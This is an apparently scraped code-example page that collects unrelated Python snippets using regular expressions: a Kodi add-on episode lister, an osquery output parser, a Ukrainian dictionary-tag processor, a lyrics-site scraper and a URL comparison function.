    dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url,name in match:
        if "Online" not in name: continue
        name=name.replace(tvshowname,'').replace('Watch Online','')
        name=main.removeNonASCII(name)
        main.addTVInfo(name,MainUrl+url,39,'','','') 
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100)/totalLinks
        remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
        if dialogWait.iscanceled(): return False   
    match=re.findall('<div id="above_threadlist" class="above_threadlist">(.+?)</div>',link)
    for string in match:
        match1=re.findall('<a href="(.+?)" title="(.+?)">[0-9]+</a>', string)
        for url, page in match1:
            main.addTVInfo(page,MainUrl+url,38,'','','')
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), 'TV Shows')
    main.VIEWS()
Example #27
0
    def run_query(self, query):
        '''Run a query, returning the results as a list of dictionaries

        When unknown output is encountered, OsqueryUnknownException is thrown.
        When osqueryi returns an error, OsqueryException is thrown.
        '''
        query = query + ';'  # Extra semicolon causes no harm
        result = self.run_command(query)
        # On Mac, the query appears first in the string. Remove it if so.
        result = re.sub(re.escape(query), '', result).strip()
        result_lines = result.splitlines()

        if len(result_lines) < 1:
            raise OsqueryUnknownException(
                'Unexpected output:\n %s' % result_lines)
        if result_lines[0].startswith(self.ERROR_PREFIX):
            raise OsqueryException(result_lines[0])

        try:
            header = result_lines[1]
            columns = re.findall('[^ |]+', header)
            rows = []
            for line in result_lines[3:-1]:
                values = re.findall('[^ |]+', line)
                rows.append(
                    dict((col, val) for col, val in zip(columns, values)))
            return rows
        except:
            raise OsqueryUnknownException(
                'Unexpected output:\n %s' % result_lines)
Example #28
0
def process_line_exceptions(line, extra_tags):
    global except_base_tag

    if not ' ' in line or re.match('.*[а-яіїєґ]/.*', line):
      return line
    if re.match('^[^ ]+ [^ ]+ [^:]?[a-z].*$', line):
      return line

    if line.startswith('# !'):
      except_base_tag = re.findall('![a-z:-]+', line)[0][1:] + ':'
      return ''
    
    base = re.findall('^[^ ]+', line)[0]
    
    except_base_tag2 = except_base_tag
    if base.endswith('ся'):
        except_base_tag2 = except_base_tag.replace('verb:', 'verb:rev:')
      
    out_line = re.sub('([^ ]+) ?', '\\1 ' + base + ' ' + except_base_tag2 + 'unknown' + extra_tags + '\n', line)
    
    if except_base_tag in ('verb:imperf:', 'verb:perf:'):
      base_add = 'inf:'
#      if base.endswith('ся'):
#        base_add = 'rev:' + base_add
      out_line = re.sub("(verb:(?:rev:)?)((im)?perf:)", "\\1inf:\\2", out_line, 1)
      
      out_lines = out_line.split('\n')
      out_lines[0] = out_lines[0].replace(':unknown', '')
      out_line = '\n'.join(out_lines)
    
    return out_line[:-1]
Example #29
0
def update_lyrics(request):  
    b = open('./artistList.txt', 'r') 
    bb = b.read()
    b.close() 
    bbb = bb.split(chr(10))

    for ar in bbb: 
        if ar.split('=')[1] == '1':
            return index(request)

        furl = "/"+ar.split('=')[1]+".htm"
        ar = ar.split('=')[0]
        artxt = ''
        
        #req = urllib2.Request(u"http://mojim.com/"+ar+".html?t1")
        #print "connected >> http://mojim.com/"+ar+".html?t1"
        #response = urllib2.urlopen(req) 
        #result = response.read()     
        print '--',furl,'--'

        if len(furl) > 0:           
            req2 = urllib2.Request("http://mojim.com"+furl) 


            response2 = urllib2.urlopen(req2)
            result2 = response2.read()     
            
            furl2 = re.findall('/tw[0-9x]*.htm', result2)
            iii = -1
            if len(furl2) > 0:        
                for furl3 in furl2: 
                    iii = iii + 1
                    if iii % 2 == 0: continue
                    try: 
                        req3 = urllib2.Request("http://mojim.com"+furl3) 
                        
                        response3 = urllib2.urlopen(req3)
                        result3 = response3.read()   
                        
                        lasturl = re.findall('<dl><dt><br /><br />[^^]*</div>', result3)
                        #a = raw_input()
                        artxt = lasturl[0].replace('更多更詳盡歌詞','').replace(u'在 ','').replace(u'Mojim.com','').replace(u'※','').replace('魔鏡歌詞網','')
  
                        aaaaaaaa = re.findall(u'title="歌詞(.*)">', artxt)
                        bbbbbbbb = re.findall('<dd><br />(.*)</dd>', artxt) 
     
                        bCnt = len(bbbbbbbb)
                        for bi in range(0, bCnt): 
                            if len(bbbbbbbb[bi]) > 22: 
                                lv = LyricsView()
                                ll = striphtml(bbbbbbbb[bi].encode('Shift_JIS').replace('<br />', '\r'))
                                ll = ll[:len(ll)-24]
                                lv.setParams({'artist':ar,'title':aaaaaaaa[bi],'lyrics':ll})
                                lv.save() 
                    except:
                        pass
        '''a = open(u''+ar+'.html', 'w')
        a.write(artxt)
        a.close()'''
    return index(request)
Example #30
0
def same_url(raw_url1, raw_url2):
    """Check if 2 URLs refer to the same primary resource

    `urltools.compare()` fails if the 2 URLs have different fragments.
    See issue #8 for details. The function treats a special case where
    the path is simply '/blog' to accommodate some blogs that refer to
    their posts via the fragment.

    Args:
        url1 (str): First URL to be compared
        url2 (str): Second URL

    Returns:
        bool: Whether the URLs are the same
    """
    arxiv_exception = 'arxiv.org'
    fragment_identifier = '#'

    url1 = _parse_url(raw_url1)
    url2 = _parse_url(raw_url2)

    # If it's on arxiv, do some acrobatics
    if url1['netloc'] == url2['netloc'] == arxiv_exception:
        regex = '([^/a-z]+\.[^/a-z.]+)'
        return re.findall(regex, url1['path']) == re.findall(regex, url2['path'])
    else:
        return urltools.compare(_normalize_url(raw_url1), _normalize_url(raw_url2))